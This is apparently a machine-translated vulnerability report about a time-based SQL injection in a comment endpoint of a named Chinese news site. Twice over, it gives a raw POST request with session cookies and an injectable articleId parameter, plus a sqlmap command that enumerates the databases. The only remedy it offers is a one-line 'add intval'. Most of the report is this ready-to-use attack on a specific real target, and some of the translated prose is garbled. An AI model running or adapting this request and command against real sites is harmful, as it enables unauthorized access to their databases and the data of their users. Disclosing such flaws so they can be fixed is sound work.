SQL Injection exists in a substation of IT Time Weekly
Weight 7: large manufacturers
Detailed description:
Http://news.ittime.com.cn/website
Article comment articleid has SQL Delayed Injection
1.txt content
POST /usershow/sendcommunup/ HTTP/1.1Host: news.ittime.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://news.ittime.com.cn/news/news_61.shtmlCookie: Hm_lvt_e7f6a0869113cfb15b058b448b1eee55=1445926773,1446104144,1446528810; CAKEPHP=8hj5k4uf5lbsgu9r4mhdg1msg7; Hm_lvt_8719c3c82036e2dfe7fdeab96976a3b9=1446107478; Hm_lpvt_e7f6a0869113cfb15b058b448b1eee55=1446531199X-Forwarded-For: 8.8.8.8'"sdfsdf1%df1%df22%#\Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 53content=11111111&articleId=61*&userId=480003&x=62&y=17
Sqlmap. py-r 1.txt -- dbs -- technique = "T" -- time-sec 10
The time-sec can be increased during the review of the Big Brother's detection. It should be shown that it is better. There is no limit, that is, it is too slow to run.
Proof of vulnerability:
Http://news.ittime.com.cn/website
Article comment articleid has SQL Delayed Injection
1.txt content
POST /usershow/sendcommunup/ HTTP/1.1Host: news.ittime.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://news.ittime.com.cn/news/news_61.shtmlCookie: Hm_lvt_e7f6a0869113cfb15b058b448b1eee55=1445926773,1446104144,1446528810; CAKEPHP=8hj5k4uf5lbsgu9r4mhdg1msg7; Hm_lvt_8719c3c82036e2dfe7fdeab96976a3b9=1446107478; Hm_lpvt_e7f6a0869113cfb15b058b448b1eee55=1446531199X-Forwarded-For: 8.8.8.8'"sdfsdf1%df1%df22%#\Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 53content=11111111&articleId=61*&userId=480003&x=62&y=17
Sqlmap. py-r 1.txt -- dbs -- technique = "T" -- time-sec 10
Solution:
Add intval.